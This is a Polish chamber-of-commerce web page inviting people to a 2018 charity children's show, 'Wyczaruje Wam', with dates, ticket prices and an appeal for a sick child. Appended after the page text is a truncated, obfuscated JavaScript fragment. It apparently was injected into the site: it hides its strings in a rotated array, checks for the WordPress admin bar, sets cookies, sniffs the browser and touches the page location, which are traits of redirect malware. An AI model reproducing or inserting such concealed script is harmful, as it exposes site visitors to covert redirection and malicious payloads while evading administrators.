Zaproszenie do udziału w przedstawieniu „Wyczaruje Wam”. | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo , grupa została powstała w 2015 roku na potrzeby przedstawienia „Pomocnicy Świętego Mikołaja”.

W tym roku Klub Kobiet Północnej Izby Gospodarczej, Centrum Kultury 105 oraz Fundacja Pokoloruj Świat serdecznie zaprasza do udziału w Widowisku „Wyczaruje Wam” 

Przedsiębiorcy z Północnej Izby Gospodarczej oraz dzieci z CK 105 po raz kolejny będą mogli spróbować swoich siła aktorskich na scenie CK 105 

Ważne terminy dotyczące widowiska:

Próby generalne: 28.02.2018 (środa), 02.03.2018 (piątek), 03.03.2018 (sobota)
Premiera: 04.03.2018 (niedziela)
Przedstawienia dla szkół i przedszkoli: 13.03.2018 (wtorek), 14.03.2018 (środa)

Ceny biletów:
Premiera: 30 zł
Szkoły, przedszkola: 10 zł

Pieniądze ze sprzedaży biletów zostaną przekazane dla dzieci z Mini Studio Poezji i Piosenki przy CK105 oraz na leczenie i rehabilitację Julki Grabskiej.

Julia w wieku 3 miesięcy przeżyła wstrząs septyczny (sepsa, posocznica piorunująca). Leczenie i rehabilitacja następstw choroby-opóźniony rozwój psychoruchowy, osłabiony wzrost prawej kości udowej i osłabiony wzrok wymagają kosztownych działań, z których wiele przekracza możliwości rodziców Julki. Dzięki systematycznej rehabilitacji i stymulacji rozwoju nauczyła się trzymać głowę, przełykać pokarm, odczuwać ciepło-zimno, stanęła na nogi i aktualnie uczy się chodzić, mówić, bawić, rysować, pisać. Bardzo lubi muzykę. Julia ma duży potencjał możliwości, systematycznie rozwija się, robi postępy i ma wielkie szanse stać się samodzielna.
https://web.facebook.com/1DlaJuliiGrabskiej/

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m